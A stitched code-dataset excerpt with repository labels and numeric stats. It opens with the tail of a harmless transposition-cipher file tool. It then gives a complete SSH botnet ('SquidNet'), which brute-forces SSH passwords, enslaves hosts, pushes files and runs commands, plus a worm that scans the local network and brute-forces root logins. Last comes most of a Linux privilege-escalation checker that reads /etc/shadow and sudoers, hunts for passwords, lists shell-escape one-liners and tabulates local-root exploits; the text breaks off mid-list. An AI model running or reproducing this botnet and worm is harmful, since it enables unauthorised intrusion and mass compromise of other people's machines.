response = input('> ')
if not response.lower().startswith('c'):
sys.exit()
# Read in the message from the input file
fileObj = open(inputFilename)
content = fileObj.read()
fileObj.close()
print('%sing...' % (myMode.title()))
# Measure how long the encryption/decryption takes.
startTime = time.time()
if myMode == 'encrypt':
translated = transpositionEncrypt.encryptMessage(myKey, content)
elif myMode == 'decrypt':
translated = transpositionDecrypt.decryptMessage(myKey, content)
totalTime = round(time.time() - startTime, 2)
print('%sion time: %s seconds' % (myMode.title(), totalTime))
# Write out the translated message to the output file.
outputFileObj = open(outputFilename, 'w')
outputFileObj.write(translated)
outputFileObj.close()
print('Done %sing %s (%s characters).' % (myMode, inputFilename, len(content)))
print('%sed file is %s.' % (myMode.title(), outputFilename))
# If transpositionCipherFile.py is run (instead of imported as a module)
# call the main() function.
if __name__ == '__main__':
main() | 37.166667 | 91 | 0.653398 |
Ethical-Hacking-Scripts | import paramiko, socket, threading, sys, os
from optparse import OptionParser
class SSH_Botnet:
def __init__(self, passw_txt, capture_output):
self.pass_list = passw_txt
self.cwd = os.getcwd()
self.passwords = self.configure_passwords()
self.ssh_bots = []
self.ips = []
self.logo()
self.usage()
self.display_bots = []
try:
self.capture_output = bool(capture_output)
except:
self.capture_output = False
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.instructor = threading.Thread(target=self.instruct)
self.instructor.start()
self.ssh_botlist = []
def logo(self):
print("""
_____ _ _ _ _ _ _____ _____ _ _ ___ ___
/ ____| (_) | | \ | | | | / ____/ ____| | | | |__ \ / _ \
| (___ __ _ _ _ _ __| | \| | ___| |_| (___| (___ | |__| | __ __ ) || | | |
\___ \ / _` | | | | |/ _` | . ` |/ _ \ __|\___ \___ \| __ | \ \ / // / | | | |
____) | (_| | |_| | | (_| | |\ | __/ |_ ____) |___) | | | | \ V // /_ | |_| |
|_____/ \__, |\__,_|_|\__,_|_| \_|\___|\__|_____/_____/|_| |_| \_/|____(_)___/
| |
|_|
SSH-Botnet By DrSquid """)
def usage(self):
print("""
[+] !help - Displays All Commands
[+] !login [ip] [user] [pass] - Attempts to Log into the ip with the user with the provided password.
[+] !infect [ip] [username] - Attempts to break into the hostname with the ip provided.
[+] !inject [filename] - Opens SFTP and uploads a file to the bots.
[+] !networkinfect [cfg] - Attempts to infect all the devices on the network(optional cfg file)
[+] !clear - Clears all of the output of this script.
[+] Any other commands will be sent to the bots as cmd commands.
""")
def configure_passwords(self):
file = open(self.pass_list,'r')
passwords = file.readlines()
return passwords
def infect(self, ip, username):
error_count = 0
print(f"[+] Brute Forcing the Password for: {username}@{ip}")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
flag = 0
for password in self.passwords:
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
passw = password.strip()
client.connect(ip, 22, username, passw, timeout=2, auth_timeout=2)
print(f"\n[!] {ip}'s Password has been found!: {passw}")
print(f"[!] Adding {username}@{ip} to the botnet.\n")
self.ips.append(ip)
self.display_bots.append(f"{username}@{ip}")
self.ssh_bots.append(client)
self.ssh_botlist.append(str(client)+' '+str(username))
flag = 1
break
except Exception as e:
client.close()
if flag == 0:
print(f"[?] Unable to Brute Force password for {username}@{ip}")
def inject(self, client, file):
if "/" in file or "\\" in file:
result = ""
for letter in file:
if letter == "/" or letter == "\\":
result += " "
else:
result += letter
split_result = result.split()
file = split_result[(len(split_result)-1)]
file_dir = ""
for item in split_result:
if item == file:
pass
else:
file_dir = file_dir + item + "/"
os.chdir(file_dir)
for usernames in self.ssh_botlist:
if str(client) in usernames:
split_item = usernames.split()
username = split_item[4]
try:
sftp = client.open_sftp()
sftp.put(file, f'C:/{username}/{file}')
except:
sftp = client.open_sftp()
sftp.put(file, f'/Users/{username}/{file}')
os.chdir(self.cwd)
def send_instruction(self, instruction):
for bot in self.ssh_bots:
try:
if self.capture_output:
for usernames in self.ssh_botlist:
if str(bot) in usernames:
split_item = usernames.split()
username = split_item[4]
stdin, stdout, stderr = bot.exec_command(instruction, get_pty=True)
stdin.close()
output = stdout.read().decode()
if output.strip() == "":
pass
else:
print(f"\n[({username})]: {output.strip()}")
else:
bot.exec_command(instruction)
except:
pass
def reg_login(self, ip, username, password):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to login to {username}@{ip} with: {password}")
client.connect(ip, 22, username, password)
print(f"\n[!] Access Granted!")
print(f"[!] Adding {username}@{ip} to the Botnet.\n")
self.ssh_bots.append(client)
self.ssh_botlist.append(str(client) + ' ' + str(username))
self.display_bots.append(f"{username}@{ip}")
except Exception as e:
print("[+] Authentication Failed. Try to check your inputs.")
def network_infect(self, config_file=None):
if config_file != None:
Replicator = Worm(self.pass_list, config_file)
else:
Replicator = Worm(self.pass_list)
def instruct(self):
while True:
try:
self.instruction = input("[+] Enter your instruction: ")
if self.instruction.startswith("!infect"):
msg_split = self.instruction.split()
targ_ip = msg_split[1]
user = msg_split[2]
infector = threading.Thread(target=self.infect, args=(targ_ip, user))
infector.start()
elif self.instruction.startswith("!inject"):
msg_split = self.instruction.split()
filename = msg_split[1]
for bot in self.ssh_bots:
injector = threading.Thread(target=self.inject, args=(bot, filename))
injector.start()
elif self.instruction.startswith("!listbots"):
print(f"[+] List of Bots: {self.display_bots}")
elif self.instruction.startswith("!networkinfect"):
msg_split = self.instruction.split()
try:
cfg_file = msg_split[1]
network_infector = threading.Thread(target=self.network_infect, args=(cfg_file,))
network_infector.start()
except:
network_infector = threading.Thread(target=self.network_infect)
network_infector.start()
elif self.instruction.startswith("!clear"):
if sys.platform == "win32":
os.system('cls')
else:
os.system('clear')
self.logo()
self.usage()
elif self.instruction.startswith("!login"):
msg_split = self.instruction.split()
ip = msg_split[1]
username = msg_split[2]
password = msg_split[3]
self.reg_login(ip,username,password)
elif self.instruction.startswith("!help"):
self.usage()
else:
sender = threading.Thread(target=self.send_instruction, args=(self.instruction,))
sender.start()
except:
pass
class Worm:
def __init__(self, passw_file,cfg_file=None):
self.cfg_file = cfg_file
self.has_cfg = False
if self.cfg_file != None:
self.cfg_contents, self.ls_contents = self.cfg(self.cfg_file)
self.os_ls = ['windows','apple','linux']
self.ips = os.popen('arp -a').readlines()
self.possiblevictims = self.identify_victims()
self.passwords_cracked = 0
self.passwords_scanned = 0
self.passw_file = passw_file
self.victims = []
self.ips_scanned = 0
print(f"\n[+] List of Possible Hosts: {self.possiblevictims}")
print("[+] Initiating Port Scan.....")
self.passwords = self.obtain_passw()
self.port_scanner = threading.Thread(target=self.begin_port_scan)
self.port_scanner.start()
def cfg(self, filename):
file = open(filename, "r")
contents = file.read()
file.close()
file = open(filename, "r")
ls_contents = file.readlines()
file.close()
if "CFGFORWORM" in contents:
self.has_cfg = True
print("[+] A Config file has been provided.")
return contents, ls_contents
else:
return None
def initiate_threads(self):
self.laster = threading.Thread(target=self.output_item)
self.laster.start()
while True:
try:
if self.ips_scanned == len(self.possiblevictims):
if len(self.victims) == 0:
print("\n[+] No Hosts with Port 22 Open.")
else:
for ip in self.victims:
if self.has_cfg:
if ip in self.cfg_contents:
if ip not in self.victims:
print(f"[+] {ip} is in config file, but not in victim list.\n[+] Ignoring.........")
else:
for line in self.ls_contents:
if ip in line:
try:
ipcfg = line.split()
try:
username = ipcfg[1]
except:
username = "root"
except:
pass
else:
username = "root"
else:
username = "root"
victim = threading.Thread(target=self.victimlogin, args=(ip, username))
victim.start()
break
except:
pass
def begin_port_scan(self):
for ip in self.possiblevictims:
try:
print(f"\n[+] Scanning {ip}.....")
portscanner = threading.Thread(target=self.port_scan, args=(ip,))
portscanner.start()
except:
pass
self.initiate_threads()
def port_scan(self, ip):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 22))
self.victims.append(ip)
print(f"\n[!] {ip} has 22 as an open Port.")
except:
print(f"\n[+] {ip} does not have 22 as an open port.")
s.close()
self.ips_scanned += 1
def obtain_passw(self):
with open(self.passw_file, "r") as file:
passwords = file.readlines()
return passwords
def identify_victims(self):
victims = []
if sys.platform == "win32":
for lines in self.ips:
try:
line = lines.split()
ip = line[0]
checker = int(ip[0])
victims.append(ip)
except:
pass
elif sys.platform == "darwin":
for lines in self.ips:
try:
line = lines.split()
ip = line[1]
ip = ip.strip('()')
checker = int(ip[0])
victims.append(ip)
except:
pass
return victims
def output_item(self):
while True:
try:
if self.passwords_scanned == len(self.victims):
break
except:
pass
def victimlogin(self, ip, username="root"):
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print(f"[+] Attempting to Brute Force Password for IP: {ip}")
flag = 0
for password in self.passwords:
try:
password = password.strip()
client.connect(ip, 22, username, password)
flag = 1
break
except:
pass
if flag == 1:
self.passwords_scanned += 1
print(f"\n[!] {ip}'s Password has been Cracked!: {password}")
print(f"[!] Adding {username}@{ip} to the Botnet.\n")
Botnet.ssh_bots.append(client)
Botnet.ssh_botlist.append(str(client) + ' ' + str(username))
Botnet.display_bots.append(f"{username}@{ip}")
else:
print(f"\n[?] {ip}'s Password was unable to be cracked.")
self.passwords_scanned += 1
class OptionParse:
def __init__(self):
if len(sys.argv) < 2:
self.usage()
else:
self.get_args()
def usage(self):
SSH_Botnet.logo(None)
print("""
[+] Option-Parsing Help:
[+] --pL, --passlist - Specifies the Brute Forcing TxT File.
[+] --cO, --captopt - Specify whether to capture bot output or not.
[+] --i, --info - Shows this message.
[+] Usage:""")
if sys.argv[0].endswith(".py"):
print("[+] python3 SquidNetSSH.py --pL <passlist> --cO <bool>")
print("[+] python3 SquidNetSSH.py --i")
else:
print("[+] SquidNetSSH --pL <passlist> --cO <bool>")
print("[+] SquidNetSSH --i")
def get_args(self):
self.opts = OptionParser()
self.opts.add_option("--pL","--passlist",dest="passlist")
self.opts.add_option("--cO", "--captopt", dest="captopt", action="store_true")
self.opts.add_option("--i","--info",dest="info",action="store_true")
args, opt = self.opts.parse_args()
if args.passlist is None:
self.usage()
else:
passlist = args.passlist
if args.captopt is None:
captopt = False
else:
captopt = True
Botnet = SSH_Botnet(passlist, captopt)
optionparser = OptionParse() | 43.387187 | 173 | 0.443517 |
Advanced-Infrastructure-Penetration-Testing | #!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
"SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
"HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
"ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
"SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
"LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
}
userInfo = execCmd(userInfo)
printResults(userInfo)
if "root" in userInfo["ID"]["results"][0]:
print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"
# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"
fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
"WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
"WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
"SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
"ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
}
fdPerms = execCmd(fdPerms)
printResults(fdPerms)
pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
"CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
"SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
}
pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)
# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"
if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
getPkgs = "rpm -qa | sort -u" # RH/other
getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
"PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
}
getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output
otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
"APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
"APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
}
otherApps = execCmd(otherApps)
printResults(otherApps)
print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"
# find the package information for the processes currently running
# under root or another super user
procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users
for proc in procs: # loop through each process
relatedpkgs = [] # list to hold the packages related to a process
try:
for user in supusers: # loop through the known super users
if (user != "") and (user in proc): # if the process is being run by a super user
procname = proc.split(" ")[4] # grab the process name
if "/" in procname:
splitname = procname.split("/")
procname = splitname[len(splitname)-1]
for pkg in pkgs: # loop through the packages
if not len(procname) < 3: # name too short to get reliable package results
if procname in pkg:
if procname in procdict:
relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
if pkg not in relatedpkgs:
relatedpkgs.append(pkg) # add pkg to the list
procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
except:
pass
for key in procdict:
print " " + key # print the process name
try:
if not procdict[key][0] == "": # only print the rest if related packages were found
print " Possible Related Packages: "
for entry in procdict[key]:
print " " + entry # print each related package
except:
pass
# EXPLOIT ENUMERATION
# First discover the avaialable tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"
devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)
print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
for result in devTools["TOOLS"]["results"]:
if cmd in result:
for item in escapeCmd[cmd]:
print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"
# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"3", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.4.20 Module Loader Local Root Exploit":{"minver":"0", "maxver":"2.4.20", "exploitdb":"12", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.22 "'do_brk()'" local Root Exploit (PoC)":{"minver":"2.4.22", "maxver":"2.4.22", "exploitdb":"129", "lang":"asm", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.22 (do_brk) Local Root Exploit (working)":{"minver":"0", "maxver":"2.4.22", "exploitdb":"131", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x mremap() bound checking Root Exploit":{"minver":"2.4", "maxver":"2.4.99", "exploitdb":"145", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.4.29-rc2 uselib() Privilege Elevation":{"minver":"0", "maxver":"2.4.29", "exploitdb":"744", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4 uselib() Privilege Elevation Exploit":{"minver":"2.4", "maxver":"2.4", "exploitdb":"778", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"895", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"926", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluez"}},
"<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":{"minver":"0", "maxver":"2.6.11", "exploitdb":"1397", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":{"minver":"0", "maxver":"99", "exploitdb":"1518", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"mysql"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2004", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2005", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2006", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2011", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.17.4 (proc) Local Root Exploit":{"minver":"0", "maxver":"2.6.17.4", "exploitdb":"2013", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":{"minver":"2.6.13", "maxver":"2.6.17.4", "exploitdb":"2031", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":{"minver":"4.10", "maxver":"7.04", "exploitdb":"3384", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":{"minver":"2.4", "maxver":"2.6", "exploitdb":"4460", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":{"minver":"0", "maxver":"2.6.11.5", "exploitdb":"4756", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"bluetooth"}},
"2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":{"minver":"2.6.17", "maxver":"2.6.24.1", "exploitdb":"5092", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.23 - 2.6.24 vmsplice Local Root Exploit":{"minver":"2.6.23", "maxver":"2.6.24", "exploitdb":"5093", "lang":"c", "keywords":{"loc":["os"], "val":"debian"}},
"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":{"minver":"0", "maxver":"99", "exploitdb":"5720", "lang":"python", "keywords":{"loc":["os"], "val":"debian"}},
"Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":{"minver":"0", "maxver":"2.6.22", "exploitdb":"6851", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.29 exit_notify() Local Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.29", "exploitdb":"8369", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 UDEV Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8478", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6 UDEV < 141 Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8572", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"udev"}},
"2.6.x ptrace_attach Local Privilege Escalation Exploit":{"minver":"2.6", "maxver":"2.6.99", "exploitdb":"8673", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.29 ptrace_attach() Local Root Race Condition Exploit":{"minver":"2.6.29", "maxver":"2.6.29", "exploitdb":"8678", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
